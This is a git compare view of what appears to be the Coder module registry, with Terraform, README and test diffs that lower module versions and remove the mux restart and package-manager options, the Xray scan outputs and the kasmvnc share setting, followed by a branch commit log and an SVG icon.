-  scan_result = (
-    length(local.scanned_images) > 0 ? local.scanned_images[0] :
-    length(local.results) > 0 ? local.results[0] :
-    null
-  )
-}
-
-data "xray_artifacts_scan" "image_scan" {
-  repo      = local.parsed_repo
-  repo_path = local.parsed_path
-}
-
-output "critical" {
-  description = "The number of critical severity vulnerabilities found in the image. Critical vulnerabilities typically require immediate attention."
-  value       = try(local.scan_result.sec_issues.critical, 0)
-}
-
-output "high" {
-  description = "The number of high severity vulnerabilities found in the image."
-  value       = try(local.scan_result.sec_issues.high, 0)
-}
-
-output "medium" {
-  description = "The number of medium severity vulnerabilities found in the image."
-  value       = try(local.scan_result.sec_issues.medium, 0)
-}
-
-output "low" {
-  description = "The number of low severity vulnerabilities found in the image."
-  value       = try(local.scan_result.sec_issues.low, 0)
-}
-
-output "total" {
-  description = "The total number of vulnerabilities found across all severity levels."
-  value       = try(local.scan_result.sec_issues.total, 0)
-}
-
-output "artifact_name" {
-  description = "The name of the artifact that was scanned, as reported by Xray. For remote repositories, this will be the SHA-based manifest name (e.g., 'myimage/sha256__abc123...')."
-  value       = try(local.scan_result.name, "")
-}
-
-output "violations" {
-  description = "The number of Xray policy violations detected. Violations are triggered when vulnerabilities match rules defined in your Xray security policies."
-  value       = try(local.scan_result.violations, 0)
-}
@@ -16,7 +16,7 @@ A module that adds JupyterLab in your Coder template.
 module "jupyterlab" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jupyterlab/coder"
-  version  = "1.2.2"
+  version  = "1.2.1"
  agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ JupyterLab is automatically configured to work with Coder's iframe embedding. Fo
 module "jupyterlab" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jupyterlab/coder"
-  version  = "1.2.2"
+  version  = "1.2.1"
  agent_id = coder_agent.main.id
  config = {
    ServerApp = {
@@ -77,7 +77,7 @@ describe("jupyterlab", async () => {
    expect(output.exitCode).toBe(1);
    expect(output.stdout).toEqual([
      "Checking for a supported installer",
-      "No supported installer found.",
+      "No valid installer is not installed",
      "Please install pipx or uv in your Dockerfile/VM image before running this script",
    ]);
  });
@@ -14,7 +14,7 @@ check_available_installer() {
    INSTALLER="uv"
    return
  fi
-  echo "No supported installer found."
+  echo "No valid installer is not installed"
  echo "Please install pipx or uv in your Dockerfile/VM image before running this script"
  exit 1
 }
@@ -14,7 +14,7 @@ Automatically install [KasmVNC](https://kasmweb.com/kasmvnc) in a workspace, and
 module "kasmvnc" {
  count               = data.coder_workspace.me.start_count
  source              = "registry.coder.com/coder/kasmvnc/coder"
-  version             = "1.3.0"
+  version             = "1.2.7"
  agent_id            = coder_agent.example.id
  desktop_environment = "xfce"
  subdomain           = true
@@ -54,15 +54,6 @@ variable "subdomain" {
  description = "Is subdomain sharing enabled in your cluster?"
 }

-variable "share" {
-  type    = string
-  default = "owner"
-  validation {
-    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
-    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
-  }
-}
-
 resource "coder_script" "kasm_vnc" {
  agent_id     = var.agent_id
  display_name = "KasmVNC"
@@ -84,7 +75,7 @@ resource "coder_app" "kasm_vnc" {
  url          = "http://localhost:${var.port}"
  icon         = "/icon/kasmvnc.svg"
  subdomain    = var.subdomain
-  share        = var.share
+  share        = "owner"
  order        = var.order
  group        = var.group

@@ -18,7 +18,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "kiro" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
  agent_id = coder_agent.main.id
 }
 ```
@@ -31,7 +31,7 @@ module "kiro" {
 module "kiro" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
 }
@@ -47,7 +47,7 @@ The following example configures Kiro to use the GitHub MCP server with authenti
 module "kiro" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
  mcp = jsonencode({
@@ -53,7 +53,7 @@ locals {

 module "vscode-desktop-core" {
  source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"

  agent_id = var.agent_id

@@ -1,31 +1,31 @@
 ---
-display_name: Mux
+display_name: mux
 description: Coding Agent Multiplexer - Run multiple AI agents in parallel
 icon: ../../../../.icons/mux.svg
 verified: true
 tags: [ai, agents, development, multiplexer]
 ---

-# Mux
+# mux

-Automatically install and run [Mux](https://github.com/coder/mux) in a Coder workspace. By default, the module auto-detects an available package manager (`npm`, `pnpm`, or `bun`) to install `mux@next` (with a fallback to downloading the npm tarball if none is found). You can also force a specific package manager via `package_manager` and point to a custom registry with `registry_url`. The launcher keeps watching the mux process after startup, appends signal/exit-code diagnostics to the mux log when the server is killed outside the Node runtime, and can optionally wait a few seconds, remove the stale server lock, and restart Mux after any exit until an optional restart-attempt cap is reached. Mux is a desktop application for parallel agentic development that enables developers to run multiple AI agents simultaneously across isolated workspaces.
+Automatically install and run [mux](https://github.com/coder/mux) in a Coder workspace. By default, the module installs `mux@next` from npm (with a fallback to downloading the npm tarball if npm is unavailable). mux is a desktop application for parallel agentic development that enables developers to run multiple AI agents simultaneously across isolated workspaces.

 ```tf
 module "mux" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.4.3"
+  version  = "1.0.7"
  agent_id = coder_agent.main.id
 }
 ```

-![Mux](../../.images/mux-product-hero.webp)
+![mux](../../.images/mux-product-hero.webp)

 ## Features

 - **Parallel Agent Execution**: Run multiple AI agents simultaneously on different tasks
 - **Mux Workspace Isolation**: Each agent works in its own isolated environment
- **Git Divergence Visualization**: Track changes across different Mux agent workspaces
+- **Git Divergence Visualization**: Track changes across different mux agent workspaces
 - **Long-Running Processes**: Resume AI work after interruptions
 - **Cost Tracking**: Monitor API usage across agents

@@ -37,7 +37,7 @@ module "mux" {
 module "mux" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.4.3"
+  version  = "1.0.7"
  agent_id = coder_agent.main.id
 }
 ```
@@ -48,107 +48,34 @@ module "mux" {
 module "mux" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.4.3"
+  version  = "1.0.7"
  agent_id = coder_agent.main.id
  # Default is "latest"; set to a specific version to pin
  install_version = "0.4.0"
 }
 ```

-### Open a Project on Launch
-
-Start Mux with `mux server --add-project /path/to/project`:
-
-```tf
-module "mux" {
-  count       = data.coder_workspace.me.start_count
-  source      = "registry.coder.com/coder/mux/coder"
-  version     = "1.4.3"
-  agent_id    = coder_agent.main.id
-  add_project = "/path/to/project"
-}
-```
-
-### Pass Arbitrary `mux server` Arguments
-
-Use `additional_arguments` to append additional arguments to `mux server`.
-The module parses quoted values, so grouped arguments remain intact.
-
-```tf
-module "mux" {
-  count                = data.coder_workspace.me.start_count
-  source               = "registry.coder.com/coder/mux/coder"
-  version              = "1.4.3"
-  agent_id             = coder_agent.main.id
-  additional_arguments = "--open-mode pinned --add-project '/workspaces/my repo'"
-}
-```
-
-### Restart After Mux Exits
-
-Enable automatic restarts after Mux exits, including clean exits and intentional shutdown signals such as `SIGTERM`. The launcher waits for `restart_delay_seconds`, removes `~/.mux/server.lock`, and starts Mux again. Set `max_restart_attempts` to a whole number to stop retrying after a fixed number of restarts, or leave it at `0` for unlimited retries.
-
-```tf
-module "mux" {
-  count                 = data.coder_workspace.me.start_count
-  source                = "registry.coder.com/coder/mux/coder"
-  version               = "1.4.3"
-  agent_id              = coder_agent.main.id
-  restart_on_kill       = true
-  restart_delay_seconds = 3
-  max_restart_attempts  = 5
-}
-```
-
 ### Custom Port

 ```tf
 module "mux" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.4.3"
+  version  = "1.0.7"
  agent_id = coder_agent.main.id
  port     = 8080
 }
 ```

-### Custom Package Manager
-
-Force a specific package manager instead of auto-detection:
-
-```tf
-module "mux" {
-  count           = data.coder_workspace.me.start_count
-  source          = "registry.coder.com/coder/mux/coder"
-  version         = "1.4.3"
-  agent_id        = coder_agent.main.id
-  package_manager = "pnpm" # or "npm", "bun"
-}
-```
-
-### Custom Registry
-
-Use a private or mirrored npm registry:
-
-```tf
-module "mux" {
-  count        = data.coder_workspace.me.start_count
-  source       = "registry.coder.com/coder/mux/coder"
-  version      = "1.4.3"
-  agent_id     = coder_agent.main.id
-  registry_url = "https://npm.pkg.github.com"
-}
-```
-
 ### Use Cached Installation

-Run an existing copy of Mux if found, otherwise install from npm:
+Run an existing copy of mux if found, otherwise install from npm:

 ```tf
 module "mux" {
  count      = data.coder_workspace.me.start_count
  source     = "registry.coder.com/coder/mux/coder"
-  version    = "1.4.3"
+  version    = "1.0.7"
  agent_id   = coder_agent.main.id
  use_cached = true
 }
@@ -156,13 +83,13 @@ module "mux" {

 ### Skip Install

-Run without installing from the network (requires Mux to be pre-installed):
+Run without installing from the network (requires mux to be pre-installed):

 ```tf
 module "mux" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.4.3"
+  version  = "1.0.7"
  agent_id = coder_agent.main.id
  install  = false
 }
@@ -174,11 +101,6 @@ module "mux" {

 ## Notes

- Mux is currently in preview and you may encounter bugs
+- mux is currently in preview and you may encounter bugs
 - Requires internet connectivity for agent operations (unless `install` is set to false)
- Auto-detects `npm`, `pnpm`, or `bun` by default; set `package_manager` to force a specific one
- Installs `mux@next` from the npm registry by default; set `registry_url` to use a private or mirrored registry
- Falls back to a direct tarball download when no package manager is found
- Appends best-effort signal and external-kill diagnostics to `log_path` if the mux process dies after startup
- Set `restart_on_kill = true` to wait `restart_delay_seconds`, remove `~/.mux/server.lock`, and restart Mux after it exits
- Set `max_restart_attempts` to a whole-number cap on restart attempts, or leave it at `0` for unlimited retries
+- Installs `mux@next` from npm by default (falls back to the npm tarball if npm is unavailable)
@@ -1,11 +1,6 @@
 import { describe, expect, it } from "bun:test";
 import {
  executeScriptInContainer,
-  execContainer,
-  findResourceInstance,
-  readFileContainer,
-  removeContainer,
-  runContainer,
  runTerraformApply,
  runTerraformInit,
  testRequiredVariables,
@@ -35,7 +30,7 @@ describe("mux", async () => {
    }
    expect(output.exitCode).toBe(0);
    const expectedLines = [
-      "📥 No package manager found; downloading tarball from registry...",
+      "📥 npm not found; downloading tarball from npm registry...",
      "🥳 mux has been installed in /tmp/mux",
      "🚀 Starting mux server on port 4000...",
      "Check logs at /tmp/mux.log!",
@@ -45,243 +40,6 @@ describe("mux", async () => {
    }
  }, 60000);

-  it("parses custom additional_arguments", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      install: false,
-      log_path: "/tmp/mux.log",
-      additional_arguments:
-        "--open-mode pinned --add-project '/workspaces/my repo'",
-    });
-
-    const instance = findResourceInstance(state, "coder_script");
-    const id = await runContainer("alpine/curl");
-
-    try {
-      const setup = await execContainer(id, [
-        "sh",
-        "-c",
-        `apk add --no-cache bash >/dev/null
-mkdir -p /tmp/mux
-cat <<'EOF' > /tmp/mux/mux
-#!/usr/bin/env sh
-i=1
-for arg in "$@"; do
-  echo "arg$i=$arg"
-  i=$((i + 1))
-done
-EOF
-chmod +x /tmp/mux/mux`,
-      ]);
-      expect(setup.exitCode).toBe(0);
-
-      const output = await execContainer(id, ["sh", "-c", instance.script]);
-      if (output.exitCode !== 0) {
-        console.log("STDOUT:\n" + output.stdout);
-        console.log("STDERR:\n" + output.stderr);
-      }
-      expect(output.exitCode).toBe(0);
-
-      await execContainer(id, ["sh", "-c", "sleep 1"]);
-      const log = await readFileContainer(id, "/tmp/mux.log");
-      expect(log).toContain("arg1=server");
-      expect(log).toContain("arg2=--port");
-      expect(log).toContain("arg3=4000");
-      expect(log).toContain("arg4=--open-mode");
-      expect(log).toContain("arg5=pinned");
-      expect(log).toContain("arg6=--add-project");
-      expect(log).toContain("arg7=/workspaces/my repo");
-    } finally {
-      await removeContainer(id);
-    }
-  }, 60000);
-
-  it("logs signal-based exits after startup", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      install: false,
-      log_path: "/tmp/mux.log",
-    });
-
-    const instance = findResourceInstance(state, "coder_script");
-    const id = await runContainer("alpine/curl");
-
-    try {
-      const setup = await execContainer(id, [
-        "sh",
-        "-c",
-        `apk add --no-cache bash >/dev/null
-mkdir -p /tmp/mux
-cat <<'EOF' > /tmp/mux/mux
-#!/usr/bin/env sh
-target_pid="$$"
-(
-  sleep 1
-  kill -9 "$target_pid"
-) &
-while true; do
-  sleep 1
-done
-EOF
-chmod +x /tmp/mux/mux`,
-      ]);
-      expect(setup.exitCode).toBe(0);
-
-      const output = await execContainer(id, ["sh", "-c", instance.script]);
-      if (output.exitCode !== 0) {
-        console.log("STDOUT:\n" + output.stdout);
-        console.log("STDERR:\n" + output.stderr);
-      }
-      expect(output.exitCode).toBe(0);
-
-      await execContainer(id, ["sh", "-c", "sleep 2"]);
-      const log = await readFileContainer(id, "/tmp/mux.log");
-      expect(log).toContain("shell exit code 137");
-      expect(log).toContain(
-        "SIGKILL usually means the process was killed externally or by the OOM killer.",
-      );
-    } finally {
-      await removeContainer(id);
-    }
-  }, 60000);
-
-  it("restarts after a clean exit when enabled", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      install: false,
-      log_path: "/tmp/mux.log",
-      restart_on_kill: true,
-      restart_delay_seconds: 1,
-      max_restart_attempts: 1,
-    });
-
-    const instance = findResourceInstance(state, "coder_script");
-    const id = await runContainer("alpine/curl");
-
-    try {
-      const setup = await execContainer(id, [
-        "sh",
-        "-c",
-        `apk add --no-cache bash >/dev/null
-mkdir -p /tmp/mux
-cat <<'EOF' > /tmp/mux/mux
-#!/usr/bin/env sh
-run_count_file="/tmp/mux-run-count"
-run_count=0
-if [ -f "$run_count_file" ]; then
-  run_count=$(cat "$run_count_file")
-fi
-run_count=$((run_count + 1))
-printf '%s' "$run_count" > "$run_count_file"
-echo "run=$run_count"
-if [ "$run_count" -eq 1 ]; then
-  mkdir -p "$HOME/.mux"
-  touch "$HOME/.mux/server.lock"
-  exit 0
-fi
-if [ -f "$HOME/.mux/server.lock" ]; then
-  echo "lock=present"
-else
-  echo "lock=cleaned"
-fi
-exit 0
-EOF
-chmod +x /tmp/mux/mux`,
-      ]);
-      expect(setup.exitCode).toBe(0);
-
-      const output = await execContainer(id, ["sh", "-c", instance.script]);
-      if (output.exitCode !== 0) {
-        console.log("STDOUT:\n" + output.stdout);
-        console.log("STDERR:\n" + output.stderr);
-      }
-      expect(output.exitCode).toBe(0);
-
-      await execContainer(id, ["sh", "-c", "sleep 4"]);
-      const log = await readFileContainer(id, "/tmp/mux.log");
-      const runCount = await readFileContainer(id, "/tmp/mux-run-count");
-      expect(log).toContain("run=1");
-      expect(log).toContain("mux server exited cleanly.");
-      expect(log).toContain(
-        "Waiting 1 seconds before restarting mux after it exited.",
-      );
-      expect(log).toContain(
-        "Removing /root/.mux/server.lock before restarting mux.",
-      );
-      expect(log).toContain("run=2");
-      expect(log).toContain("lock=cleaned");
-      expect(log).toContain(
-        "Reached the max restart attempts limit (1); not restarting mux again.",
-      );
-      expect(runCount.trim()).toBe("2");
-    } finally {
-      await removeContainer(id);
-    }
-  }, 60000);
-
-  it("restarts after SIGTERM when enabled", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      install: false,
-      log_path: "/tmp/mux.log",
-      restart_on_kill: true,
-      restart_delay_seconds: 1,
-      max_restart_attempts: 1,
-    });
-
-    const instance = findResourceInstance(state, "coder_script");
-    const id = await runContainer("alpine/curl");
-
-    try {
-      const setup = await execContainer(id, [
-        "sh",
-        "-c",
-        `apk add --no-cache bash >/dev/null
-mkdir -p /tmp/mux
-cat <<'EOF' > /tmp/mux/mux
-#!/usr/bin/env sh
-run_count_file="/tmp/mux-run-count"
-run_count=0
-if [ -f "$run_count_file" ]; then
-  run_count=$(cat "$run_count_file")
-fi
-run_count=$((run_count + 1))
-printf '%s' "$run_count" > "$run_count_file"
-echo "run=$run_count"
-if [ "$run_count" -eq 1 ]; then
-  kill -TERM $$
-fi
-exit 0
-EOF
-chmod +x /tmp/mux/mux`,
-      ]);
-      expect(setup.exitCode).toBe(0);
-
-      const output = await execContainer(id, ["sh", "-c", instance.script]);
-      if (output.exitCode !== 0) {
-        console.log("STDOUT:\n" + output.stdout);
-        console.log("STDERR:\n" + output.stderr);
-      }
-      expect(output.exitCode).toBe(0);
-
-      await execContainer(id, ["sh", "-c", "sleep 4"]);
-      const log = await readFileContainer(id, "/tmp/mux.log");
-      const runCount = await readFileContainer(id, "/tmp/mux-run-count");
-      expect(log).toContain("run=1");
-      expect(log).toContain("signal TERM (15); shell exit code 143.");
-      expect(log).toContain(
-        "Waiting 1 seconds before restarting mux after it exited.",
-      );
-      expect(log).toContain("run=2");
-      expect(log).toContain(
-        "Reached the max restart attempts limit (1); not restarting mux again.",
-      );
-      expect(runCount.trim()).toBe("2");
-    } finally {
-      await removeContainer(id);
-    }
-  }, 60000);
-
  it("runs with npm present", async () => {
    const state = await runTerraformApply(import.meta.dir, {
      agent_id: "foo",
@@ -297,7 +55,7 @@ chmod +x /tmp/mux/mux`,
    expect(output.exitCode).toBe(0);
    const expectedLines = [
      "📦 Installing mux via npm into /tmp/mux...",
-      "⏭️  Skipping lifecycle scripts with --ignore-scripts",
+      "⏭️  Skipping npm lifecycle scripts with --ignore-scripts",
      "🥳 mux has been installed in /tmp/mux",
      "🚀 Starting mux server on port 4000...",
      "Check logs at /tmp/mux.log!",
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
35C4n0r	6802df9d13	hopefully final wip	2026-01-20 17:49:05 +00:00
35C4n0r	a7e0b09aa4	wip	2026-01-20 17:43:22 +00:00
35C4n0r	229056b344	wip	2026-01-20 17:35:20 +00:00
35C4n0r	f257efd8e1	wip	2026-01-20 17:19:25 +00:00
35C4n0r	9258f1857f	wip	2026-01-20 17:14:57 +00:00
35C4n0r	5c4480daa3	wip	2026-01-19 18:44:09 +00:00
35C4n0r	0ffd71d443	wip	2026-01-19 18:31:34 +00:00
35C4n0r	60ed61368e	bun fmt	2026-01-19 18:14:41 +00:00
35C4n0r	5f4d7bf1b4	feat: merge to main changes	2026-01-19 18:13:21 +00:00
35C4n0r	c411657a67	feat: merge to main changes	2026-01-19 18:10:00 +00:00
35C4n0r	d8a96435c6	Merge branch 'main' into feat-conditional-agentapi # Conflicts: # registry/coder/modules/claude-code/main.tf # registry/coder/modules/claude-code/scripts/install.sh # registry/coder/modules/claude-code/scripts/start.sh	2026-01-19 18:05:31 +00:00
35C4n0r	d4efc09b20	bun fmt Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 18:05:17 +00:00
35C4n0r	4b03bce6f7	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 18:00:11 +00:00
35C4n0r	ae48c1043b	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 17:47:20 +00:00
35C4n0r	73af151f8d	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 17:39:22 +00:00
35C4n0r	c115d860f7	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 17:21:53 +00:00
35C4n0r	395f170d07	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 17:11:49 +00:00
35C4n0r	65189bc068	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 12:50:51 +00:00
35C4n0r	d3b5057819	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 12:46:45 +00:00
35C4n0r	dd86d3d1d8	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 12:41:21 +00:00
35C4n0r	1dee0012f5	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 12:37:52 +00:00
35C4n0r	ef0f597d54	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 12:31:26 +00:00
35C4n0r	aaf2c4e0dd	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 12:23:27 +00:00
35C4n0r	090fa7dd1d	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 11:04:55 +00:00
35C4n0r	a630ffa42a	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 10:13:30 +00:00
35C4n0r	93f9ec3708	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 10:07:30 +00:00
35C4n0r	5870805d0f	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 09:26:01 +00:00
35C4n0r	6806985778	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 09:20:48 +00:00
35C4n0r	149e65b49f	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 09:13:33 +00:00
35C4n0r	327f05487d	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-14 09:07:52 +00:00
35C4n0r	19dc50db3e	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-13 11:33:20 +00:00
35C4n0r	48564621ad	Merge branch 'main' into feat-conditional-agentapi # Conflicts: # registry/coder/modules/claude-code/main.tf # registry/coder/modules/claude-code/scripts/start.sh	2025-12-13 11:30:22 +00:00
35C4n0r	d0ef4f426b	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-13 11:28:06 +00:00
35C4n0r	c2fa87aea6	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-12 18:13:53 +00:00
35C4n0r	63eff436eb	wip Signed-off-by: 35C4n0r <work.jaykumar@gmail.com>	2025-12-12 18:02:51 +00:00
35C4n0r	250b64e44f	wip	2025-12-05 19:18:01 +05:30
35C4n0r	78a0d14863	wip	2025-12-05 19:14:55 +05:30
35C4n0r	0d0bfa7131	wip	2025-12-05 19:10:01 +05:30
35C4n0r	b32b2d4329	wip	2025-12-05 19:08:58 +05:30
35C4n0r	8664ded490	wip	2025-12-05 18:38:37 +05:30
35C4n0r	2ed4be2172	wip	2025-12-05 18:36:42 +05:30
35C4n0r	d718c3b4e9	wip	2025-12-05 18:30:08 +05:30
35C4n0r	19f2a8f3ec	wip	2025-12-04 21:42:56 +05:30
35C4n0r	e12cd61e45	wip	2025-12-04 21:39:49 +05:30
35C4n0r	09386a43cd	wip	2025-12-04 21:30:11 +05:30
35C4n0r	50eb191eaa	wip	2025-12-04 21:29:50 +05:30
35C4n0r	bdc8aea37f	wip	2025-12-04 08:27:15 +05:30
35C4n0r	c6a7d049bd	wip	2025-12-04 08:17:07 +05:30
35C4n0r	65a73a8708	wip	2025-12-03 21:32:47 +05:30
35C4n0r	05c5724561	wip	2025-12-03 18:43:25 +05:30
35C4n0r	0d03fa4e58	wip	2025-12-03 18:34:46 +05:30
35C4n0r	f3bfa9cc8d	wip	2025-12-03 16:49:30 +05:30
35C4n0r	a91c8845cb	wip	2025-12-03 16:49:08 +05:30
35C4n0r	2c00575203	wip	2025-11-28 21:34:11 +05:30
35C4n0r	c5d83570bc	wip	2025-11-28 21:24:27 +05:30
35C4n0r	dd96e8c74b	feat: conditional agentapi	2025-11-28 21:22:06 +05:30
				`@@ -1 +0,0 @@`
				<svg role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>1Password</title><circle cx="12" cy="12" r="12" fill="#0572EC"/><path fill="#fff" d="M11.105 4.864h1.788c.484 0 .729.002.914.096a.86.86 0 0 1 .377.377c.094.185.095.428.095.912v6.016c0 .12 0 .182-.015.238a.427.427 0 0 1-.067.137.923.923 0 0 1-.174.162l-.695.564c-.113.092-.17.138-.191.194a.216.216 0 0 0 0 .15c.02.055.078.101.191.193l.695.565c.094.076.14.115.174.162.03.042.053.087.067.137a.936.936 0 0 1 .015.238v2.746c0 .484-.001.727-.095.912a.86.86 0 0 1-.377.377c-.185.094-.43.096-.914.096h-1.788c-.484 0-.726-.002-.912-.096a.86.86 0 0 1-.377-.377c-.094-.185-.095-.428-.095-.912v-6.016c0-.12 0-.182.015-.238a.437.437 0 0 1 .067-.139c.034-.047.08-.083.174-.16l.695-.564c.113-.092.17-.138.191-.194a.216.216 0 0 0 0-.15c-.02-.055-.078-.101-.191-.193l-.695-.565a.92.92 0 0 1-.174-.162.437.437 0 0 1-.067-.139.92.92 0 0 1-.015-.236V6.25c0-.484.001-.727.095-.912a.86.86 0 0 1 .377-.377c.186-.094.428-.096.912-.096z"/></svg>